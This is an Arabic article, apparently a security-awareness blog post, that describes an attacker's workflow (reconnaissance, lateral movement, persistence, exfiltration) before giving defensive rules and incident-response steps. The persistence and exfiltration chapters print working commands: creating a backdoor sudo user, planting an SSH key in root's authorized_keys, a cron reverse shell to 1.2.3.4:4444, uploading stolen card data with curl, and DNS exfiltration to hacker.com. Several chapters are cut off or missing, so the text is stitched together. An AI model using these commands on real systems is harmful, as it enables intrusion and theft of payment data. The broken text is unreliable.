الفصل الأول: عقلية المخترق — كيف يفكر قبل أن يلمس أي جهاز؟
المخترق الحقيقي لا يبدأ بالكود. يبدأ بالعقل. قبل أن يكتب حرفاً واحداً، يجلس ويفكر: "ما هو أضعف نقطة في هذا النظام؟" النظام ليس مجرد جهاز. النظام هو شخص يستخدم الجهاز، شركة تديره، موظف لديه صلاحيات، راوتر قديم لم يُحدَّث، صفحة تطلب رقماً فقط.
المخترق يرى العالم كسلسلة من الأبواب. بعضها مغلق، بعضها موصد، وبعضها مفتوح قليلاً. هو لا يكسر الباب. يبحث عن الباب المفتوح قليلاً. هذا هو الفرق بين الهاكر والمجرم. الهاكر يبحث عن الثغرة. المجرم يكسر الزجاج.
السؤال الأول الذي يطرحه على نفسه: ما نوع البيانات التي أريدها؟ أرقام كروت؟ كلمات مرور؟ صور؟ أموال؟ بمجرد أن يحدد الهدف، يبدأ في رسم خريطة. الخريطة ليست جغرافية. الخريطة هي مسار الوصول. من أين أدخل؟ ماذا أحتاج؟ ما هي العوائق؟ كم من الوقت لدي؟
---
الفصل الثاني: الاستطلاع — جمع المعلومات دون أن يراك أحد
المخترق لا يهجم أولاً. يستطلع. يجلس في الظل ويجمع المعلومات. هذا ما يسمى OSINT (الاستخبارات مفتوحة المصدر). يبحث في جوجل، في تليجرام، في فيسبوك، في لينكد إن. يبحث عن أسماء الموظفين، عن بريدهم الإلكتروني، عن أرقام هواتفهم، عن أسماء الشبكات التي يستخدمونها.
ماذا يفعل بالضبط؟
يدخل إلى مواقع مثل Shodan و Censys. هذه محركات بحث تبحث عن الأجهزة المتصلة بالإنترنت. يكتب اسم شركتك، فيجد الراوتر الخاص بك مكشوفاً. يجد الكاميرا الخاصة بك مفتوحة. يجد نظام الكروت الخاص بك له منفذ مفتوح على الإنترنت. هذه هي الكارثة الأولى. جهازك ليس مخفياً. هو مكشوف للعالم.
ثم ينتقل إلى Google Dorking. يكتب في جوجل عبارات مثل:
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com intitle:"index of"
هذه العبارات تكشف ملفات حساسة، صفحات إدارية، مجلدات مفتوحة. المخترق لا يخمن. هو يبحث. والبحث هو السلاح الأول.
ماذا يفعل بعدها؟
يجمع عناوين IP. من خلال أدوات مثل whois و nslookup. يعرف من أين تستضيف موقعك. يعرف مزود الخدمة. يعرف الثغرات في مزود الخدمة. ثم ينتقل إلى مسح الشبكة. يستخدم Nmap. يكتب:
nmap -sV -sC -O 182.16.0.1
هذا الأمر يخبره بـ المنافذ المفتوحة، الخدمات التي تعمل، نظام التشغيل، الإصدارات. كل إصدار قديم هو ثغرة معروفة. كل منفذ مفتوح هو باب خلفي.
---
الفصل الثالث
يستطيع قراءة أي ملف. تعديل أي إعداد. إضافة مستخدم جديد. مسح السجلات. تثبيت باب خلفي. لا أحد يستطيع إيقافه.
---
الفصل الخامس: الحركة الجانبية — الانتشار في الشبكة
المخترق لا يريد جهازاً واحداً. يريد الشبكة كلها. الآن يبدأ الحركة الجانبية (Lateral Movement). ينتقل من جهاز إلى جهاز. من خادم إلى خادم. من راوتر إلى راوتر.
كيف يفعل ذلك؟
يستخدم الجهاز المخترق كنقطة انطلاق. يمسح الشبكة الداخلية:
nmap -sn 182.16.0.0/24
هذا الأمر يكتشف كل الأجهزة في الشبكة. ثم يبحث عن الثغرات في كل جهاز. يستخدم كلمات المرور المسروقة من الجهاز الأول. يجربها على الأجهزة الأخرى. كثير من الناس يستخدمون نفس كلمة المرور في كل مكان. هذه هي الكارثة.
ماذا يفعل بعدها؟
يصل إلى الراوتر الرئيسي. يصل إلى الخادم. يصل إلى قاعدة البيانات. يصل إلى الكاميرات. يصل إلى كل شيء. الآن هو يتحكم في الشبكة بالكامل. أنت خارج الشبكة. هو داخلها.
---
الفصل السادس: الثبات — كيف يبقى داخل النظام؟
المخترق لا يريد أن يُطرد. يريد البقاء. يثبت باباً خلفياً (Backdoor). هذا الباب يسمح له بالدخول متى شاء. حتى لو غيرت كلمة المرور. حتى لو حدثت النظام.
كيف يفعل ذلك؟
يضيف مستخدم جديد بصلاحيات مدير:
useradd -m -s /bin/bash backdoor
passwd backdoor
usermod -aG sudo backdoor
يضيف مفتاح SSH:
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
يضيف كرون جوب يعيد تشغيل الباب الخلفي كل دقيقة:
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/1.2.3.4/4444 0>&1'
هذا الكود يفتح اتصالاً عكسياً (Reverse Shell) إلى جهاز المخترق. كل دقيقة. إذا انقطع الاتصال، يعود. لا يمكن إيقافه إلا إذا عرفت مكانه.
---
الفصل السابع: السرقة — كيف يأخذ البيانات؟
المخترق الآن داخل. مدير. ثابت. يبدأ السرقة (Exfiltration). يبحث عن الملفات الحساسة. أرقام الكروت. كلمات المرور. بيانات العملاء. كل شيء.
كيف يفعل ذلك؟
يستخدم أدوات الضغط لضغط البيانات:
tar -czf /tmp/data.tar.gz /var/www/html/cards/
ثم يرسلها إلى جهازه:
curl -X POST -F "file=@/tmp/data.tar.gz" http://1.2.3.4/upload
أو يرسلها عبر DNS:
cat /tmp/data.tar.gz | base64 | while read line; do dig $line.hacker.com; done
هذه الطريقة لا تثير الشك. لأن DNS مسموح به في كل الشبكات. لا أحد يراقبه.
ماذا بع
القاعدة الثامنة: اعمل نسخاً احتياطية. بشكل دوري. إذا اخترق النظام، تستطيع استعادته. النسخة الاحتياطية هي تأمينك الأخير.
القاعدة التاسعة: شفر البيانات. حتى لو سرق المخترق الملف، لن يفهم شيئاً. التشفير هو آخر خط دفاع.
القاعدة العاشرة: لا تستخدم شبكات عامة. شبكات المطاعم. الفنادق. المطارات. هذه الشبكات مصائد. المخترق يجلس فيها. ينتظر. أنت تدخل. يسرقك.
---
الفصل العاشر: ماذا تفعل إذا اكتشفت الاختراق؟
الخطوة الأولى: افصل الإنترنت. فوراً. أغلق الراوتر. أغلق الواي فاي. لا تدع المخترق يتحكم أكثر.
الخطوة الثانية: غير كل كلمات المرور. من جهاز نظيف. لا تستخدم الجهاز المخترق. لأنه قد يسجل كلمات المرور الجديدة.
الخطوة الثالثة: فعل التحقق بخطوتين. على كل حساب. جوجل. تليجرام. واتساب. كل شيء.
الخطوة الرابعة: افحص الأجهزة. ابحث عن برامج تجسس. ابحث عن تطبيقات غريبة. احذفها.
الخطوة الخامسة: أعد ضبط الراوتر. إلى المصنع. ثم أعد إعداده من الصفر. بكلمات مرور قوية.
الخطوة السادسة: أبلغ من يهمه الأمر. إذا سرقت أموال، أبلغ البنك. إذا سرقت بيانات، أبلغ العملاء. لا تخف. التأخير يزيد الضرر.
الخطوة السابعة: تعلم. من الخطأ. لا تكرره. كل اختراق هو درس. الدرس يجعلك أقوى.
---
الخلاصة النهائية: القوة الحقيقية
القوة الحقيقية ليست في الاختراق. القوة الحقيقية في الحماية. المخترق يخرب. الحامي يبني. المخترق يختبئ. الحامي يواجه. المخترق يأخذ. الحامي يعطي.
أنت تريد أن تكون حامياً. لا مخترقاً. الفرق ليس في المهارة. الفرق في النية. النية هي كل شيء.
تعلم لتحمي. تعلم لتبني. تعلم لتعطي. هذا هو الأمن السيبراني الحقيقي.
ما وراء Nmap: كيف يفكر المحترف عند فحص المنافذ والخدمات؟
كثير ناس يشغّلون Nmap ويشوفون:
22 open
80 open
443 open
ويقولون "خلاص انتهينا".
المحترف ما يوقف هنا.
يسأل:
ليش هذا المنفذ مفتوح؟
وش الخدمة الحقيقية خلفه؟
وش الإصدار؟
هل في شيء غير متوقع؟
وش يستاهل التحقيق أكثر؟
المقال يشرح:
الفرق بين open / closed / filtered
ليش معرفة المنفذ المفتوح مو كافية
كيف تقرأ النتائج بطريقة احترافية
كيف تفكر قبل ما تتخذ أي خطوة
رابط المقال كامل:
https://theabdullahpath.blogspot.com/2026/08/nmap.html